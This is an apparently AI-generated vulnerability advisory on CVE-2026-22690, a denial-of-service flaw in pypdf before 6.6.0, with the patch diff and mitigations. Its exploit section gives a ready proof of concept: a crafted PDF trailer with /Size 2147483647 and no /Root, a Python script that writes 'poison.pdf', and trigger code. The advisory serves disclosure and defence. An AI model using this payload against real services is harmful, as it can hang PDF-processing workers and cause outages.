CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-22690
CVSS 5.3 · EPSS 0.02%

The Never-Ending Story: Infinite Loops in pypdf

Amit Schendel
Senior Security Researcher

Feb 21, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

A resource exhaustion vulnerability in pypdf < 6.6.0 allows attackers to cause a Denial of Service (DoS) via malformed PDFs. By inflating the trailer's `/Size` parameter and omitting `/Root`, an attacker forces the parser into a recovery loop whose length the attacker controls.

Parsing PDFs is a thankless task, akin to translating ancient hieroglyphs written by a drunk scribe. `pypdf`, a popular Python library, tried to be helpful by 'fixing' broken files on the fly. Unfortunately, this benevolence created a denial-of-service vector (CVE-2026-22690). By simply omitting a root definition and lying about the object count, an attacker can force the library into a near-infinite search loop, pinning a CPU core at 100% until the heat death of the universe, or until someone kills the process.

The Hook: Kindness Kills

PDFs are notoriously broken. The specification is a sprawling mess of legacy debt, and most PDF writers generate garbage that only Adobe Reader, and a few brave open-source libraries, can parse. pypdf falls into the "brave" category. It includes a "non-strict" mode (strict=False, the default for PdfReader) designed to recover data from malformed files.

Here is the problem: recovery requires heuristics. When a PDF is missing critical structural elements, the library has to go hunting for them. In CVE-2026-22690, the library's hunt for a missing /Root object turns into a death march. The developers assumed that the file's trailer dictionary would honestly report the number of objects via the /Size key.

In the security world, we have a golden rule: Never trust input metadata. If a file's trailer says "I have 10 billion objects," you don't start a loop that counts to 10 billion. But that is exactly what happened here. This isn't a buffer overflow or a fancy ROP chain; it's a logic flaw born of optimism.

The Flaw: Trusting the Liar

To understand this bug, you need to know how a PDF ends. The file concludes with a trailer dictionary, which points to the /Root (the catalog of the document) and usually includes a /Size key indicating the number of objects in the cross-reference table.

When pypdf operates in strict=False mode and encounters a PDF without a /Root pointer, it panics slightly. "No problem," it thinks, "I'll just scan all the objects to find one that looks like a Catalog."

How many objects does it scan? It asks the /Size key.

# The logic before the fix
nb = cast(int, self.trailer.get("/Size", 0))
for i in range(nb):
    # Expensive lookup operation
    o = self.get_object(i + 1)

See the issue? The attacker controls /Size. If I hand you a 1KB PDF file but set /Size to 2,147,483,647 (the maximum signed 32-bit integer), the library dutifully attempts to resolve over 2 billion objects. Since the file is small and those objects don't actually exist, each get_object call fails, the error is caught, and the loop moves on to the next iteration. It spins the CPU for hours, doing absolutely nothing of value.
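To get a feel for the scale, here is a rough sketch that times the same "try, fail, continue" pattern on a small sample and extrapolates to the claimed /Size. The `failing_lookup` function is a hypothetical stand-in, not pypdf's `get_object`; a real lookup does far more work per call, so treat the projection as a lower bound.

```python
import time


def failing_lookup(object_number: int) -> None:
    """Hypothetical stand-in for looking up an object that does not exist."""
    raise KeyError(object_number)


def time_recovery_scan(claimed_size: int) -> float:
    """Run the unbounded scan pattern and return the elapsed seconds."""
    start = time.perf_counter()
    for i in range(claimed_size):
        try:
            failing_lookup(i + 1)
        except Exception:
            continue  # swallow the error and keep scanning
    return time.perf_counter() - start


sample = 200_000
elapsed = time_recovery_scan(sample)
# Linear extrapolation from the sample to the attacker's claimed /Size.
projected = (elapsed / sample) * 2_147_483_647

print(f"{sample} iterations took {elapsed:.3f}s")
print(f"Projected for /Size 2147483647: {projected / 60:.1f} minutes")
```

The exact numbers depend on the machine; the point is that the cost scales linearly with a value the attacker picks.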

The Code: Adding a Safety Rail

The fix provided in version 6.6.0 is a classic "sanity check." The developers realized that while they want to recover broken files, they shouldn't spend eternity doing it. They introduced a hard limit on the recovery search.

Here is the diff analysis for pypdf/_reader.py:

The Vulnerable Logic:

if self._validated_root is None:
    # Blindly trust /Size
    nb = cast(int, self.trailer.get("/Size", 0))
    for i in range(nb):
        try:
            o = self.get_object(i + 1)
            # ... check if o is Catalog ...

The Fixed Logic (v6.6.0):

# Introduce a configurable limit (default 10,000?)
self._root_object_recovery_limit = (
    root_object_recovery_limit 
    if isinstance(root_object_recovery_limit, int) 
    else sys.maxsize
)
 
# ... inside the loop ...
for i in range(number_of_objects):
    # The Circuit Breaker
    if i >= self._root_object_recovery_limit:
        raise LimitReachedError("Maximum Root object recovery limit reached.")

This change ensures that even if /Size claims to be billions, the loop terminates after a reasonable number of attempts, preventing the CPU exhaustion.
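The same circuit-breaker idea can be sketched outside the library. Everything below is illustrative: `find_catalog`, `RecoveryLimitReached`, and the `lookup` callable are hypothetical names, and the default limit of 10,000 simply mirrors the guess in the comment above rather than a confirmed value.

```python
from typing import Any, Callable, Optional


class RecoveryLimitReached(Exception):
    """Hypothetical stand-in for the library's LimitReachedError."""


def find_catalog(
    lookup: Callable[[int], Any],
    claimed_size: int,
    limit: int = 10_000,  # assumed default, for illustration only
) -> Optional[dict]:
    """Scan object numbers 1..claimed_size for a /Catalog, giving up at `limit`."""
    for i in range(claimed_size):
        # The circuit breaker: never iterate more than `limit` times,
        # no matter what the trailer claims.
        if i >= limit:
            raise RecoveryLimitReached("Maximum Root object recovery limit reached.")
        try:
            obj = lookup(i + 1)
        except Exception:
            continue  # missing or broken object, try the next one
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj
    return None


# A tiny fake object table: only object 3 exists, and it is the catalog.
objects = {3: {"/Type": "/Catalog"}}
print(find_catalog(objects.__getitem__, claimed_size=2_147_483_647))
```

Raising instead of silently returning makes the failure visible to the caller, which can then reject the file rather than treat it as an empty document.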

The Exploit: Crafting the Poisoned PDF

Exploiting this is trivially easy. You don't need shellcode. You just need a text editor. A PDF is arguably just a text file with some binary blobs. We can construct a minimal "killer" PDF that consists of a header and a malicious trailer.

Step 1: The Header

Standard PDF header.

%PDF-1.7

Step 2: The Body

We don't need a body. In fact, fewer objects make the parser hit the loop faster.

Step 3: The Malicious Trailer

We omit /Root (triggering the recovery path) and set /Size to the maximum signed 32-bit integer.

trailer
<<
  /Size 2147483647
>>
startxref
0
%%EOF
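If you would rather generate the file than type it, the header and trailer above can be assembled with a few lines of standard-library Python. This is a sketch for testing your own systems: `build_poison_pdf` is a hypothetical helper name, and the output simply reproduces the layout shown above.

```python
from pathlib import Path


def build_poison_pdf(claimed_size: int = 2_147_483_647) -> bytes:
    """Assemble a header plus a trailer that has /Size but no /Root."""
    lines = [
        b"%PDF-1.7",
        b"trailer",
        b"<<",
        b"  /Size " + str(claimed_size).encode("ascii"),
        b">>",
        b"startxref",
        b"0",
        b"%%EOF",
    ]
    return b"\n".join(lines) + b"\n"


if __name__ == "__main__":
    data = build_poison_pdf()
    Path("poison.pdf").write_bytes(data)
    print(f"Wrote poison.pdf ({len(data)} bytes)")
```

Lowering `claimed_size` to a few thousand gives a harmless variant for regression tests that still exercises the recovery path.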

Step 4: The Trigger

Load this into a Python environment:

from pypdf import PdfReader
 
# strict=False is the default; it is spelled out here to make the mode explicit
reader = PdfReader("poison.pdf", strict=False)
 
# Accessing pages triggers the root lookup
print(len(reader.pages))

Result: The process hangs. The fan spins up. The developer cries.

The Impact: Why Denial of Service Matters

You might shrug at a DoS. "So what? I restart the container." But consider where pypdf is used. It's the engine behind thousands of "Upload your Resume" portals, automated invoice scanners, and archival bots.

If you run a service that accepts PDFs from the public internet and processes them asynchronously:

  1. Resource Starvation: An attacker uploads 10 of these files.
  2. Worker Exhaustion: 10 of your workers get pinned in loops that will not finish in any useful timeframe.
  3. Service Outage: Valid users can't process documents.
  4. Cost Explosion: If you are on AWS Lambda or auto-scaling EC2, you are now paying for compute time that is doing nothing but counting to 2 billion.

In serverless environments, this is particularly nasty as it guarantees a timeout, maxing out the billed duration for every invocation.

The Fix: Update or Die

The mitigation is straightforward. If you are using pypdf, check your version.

Primary Mitigation: Upgrade to pypdf >= 6.6.0.

pip install pypdf --upgrade
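To confirm what is actually installed, a small check against the fixed version can run in CI or at service startup. This is a minimal sketch: `parse_release` and `is_vulnerable` are hypothetical helpers that only compare the leading numeric release, so pre-release suffixes are ignored; a dedicated version-parsing library is the more robust choice for real tooling.

```python
import re
from importlib.metadata import PackageNotFoundError, version
from typing import Optional, Tuple

FIXED_RELEASE = (6, 6, 0)  # first fixed version, per this article


def parse_release(raw: str) -> Tuple[int, int, int]:
    """Extract (major, minor, patch) from the start of a version string."""
    match = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", raw)
    if match is None:
        raise ValueError(f"Unrecognized version string: {raw!r}")
    major, minor, patch = (int(group or 0) for group in match.groups())
    return (major, minor, patch)


def is_vulnerable(raw: str) -> bool:
    """True if the given pypdf version predates the fix."""
    return parse_release(raw) < FIXED_RELEASE


def installed_pypdf_is_vulnerable() -> Optional[bool]:
    """Check the installed pypdf; None means it is not installed."""
    try:
        return is_vulnerable(version("pypdf"))
    except PackageNotFoundError:
        return None


if __name__ == "__main__":
    print("vulnerable:", installed_pypdf_is_vulnerable())
```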

Workaround (if you can't upgrade): Enforce strict parsing. This disables the recovery logic entirely. The side effect is that actually broken PDFs will raise an exception instead of being partially read—but that is better than your server melting.

reader = PdfReader(stream, strict=True)

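If you must stay on an older version and allow non-strict parsing, run the parsing in a separate process with a hard timeout and kill that process if it takes longer than a few seconds. signal.alarm can serve the same purpose, but it is Unix-only and works only from the main thread. Async timeouts such as asyncio.wait_for do not help on their own, because they cannot preempt a synchronous, CPU-bound call.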
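One way to sketch the timeout approach is to push the parsing into a child interpreter and let `subprocess.run` enforce the deadline. The helper names (`run_python_with_timeout`, `count_pages_safely`) and the 5-second default are assumptions for illustration; the child snippet uses only the `PdfReader(...).pages` call shown earlier.

```python
import subprocess
import sys
from typing import Optional, Sequence


def run_python_with_timeout(
    code: str, args: Sequence[str], timeout_s: float
) -> Optional[str]:
    """Run `code` in a child interpreter; return its stdout, or None on timeout/error."""
    try:
        result = subprocess.run(
            [sys.executable, "-c", code, *args],
            capture_output=True,
            text=True,
            timeout=timeout_s,  # the child is killed when this expires
            check=True,
        )
    except (subprocess.TimeoutExpired, subprocess.CalledProcessError):
        return None
    return result.stdout.strip()


# Code executed in the child process; sys.argv[1] is the PDF path.
PAGE_COUNT_SNIPPET = (
    "import sys\n"
    "from pypdf import PdfReader\n"
    "print(len(PdfReader(sys.argv[1]).pages))\n"
)


def count_pages_safely(path: str, timeout_s: float = 5.0) -> Optional[int]:
    """Return the page count, or None if parsing failed or ran too long."""
    output = run_python_with_timeout(PAGE_COUNT_SNIPPET, [path], timeout_s)
    return int(output) if output is not None and output.isdigit() else None
```

A `None` result should be treated as "reject this upload", since the caller cannot distinguish a hostile file from a merely broken one. Spawning an interpreter per file costs some latency, which is usually an acceptable trade for a hard upper bound on CPU time.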

Official Patches

pypdf: Pull Request implementing the search limit


Technical Appendix

CVSS Score: 5.3 / 10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Probability: 0.02% (Top 95% most exploited)

Affected Systems

  • pypdf < 6.6.0
  • Python applications processing user-uploaded PDFs

Affected Versions Detail

Product          Affected Versions   Fixed Version
pypdf (py-pdf)   < 6.6.0             6.6.0

Attribute        Detail
CWE ID           CWE-400 (Uncontrolled Resource Consumption)
CVSS v3.1        5.3 (Medium)
Attack Vector    Network (Context-dependent)
Impact           Denial of Service (Availability)
Exploit Status   PoC Available (Trivial to construct)
EPSS Score       0.00019 (Low Probability)

MITRE ATT&CK Mapping

T1499: Endpoint Denial of Service (Tactic: Impact)

CWE-400: Uncontrolled Resource Consumption

The software does not properly control the allocation and maintenance of a limited resource, allowing an actor to influence the amount of resources consumed.

Known Exploits & Detection

Manual: Construct a PDF with missing /Root and trailer /Size set to 2147483647.

Vulnerability Timeline

2026-01-09: Patch Committed (v6.6.0)
2026-01-10: GHSA Advisory Published

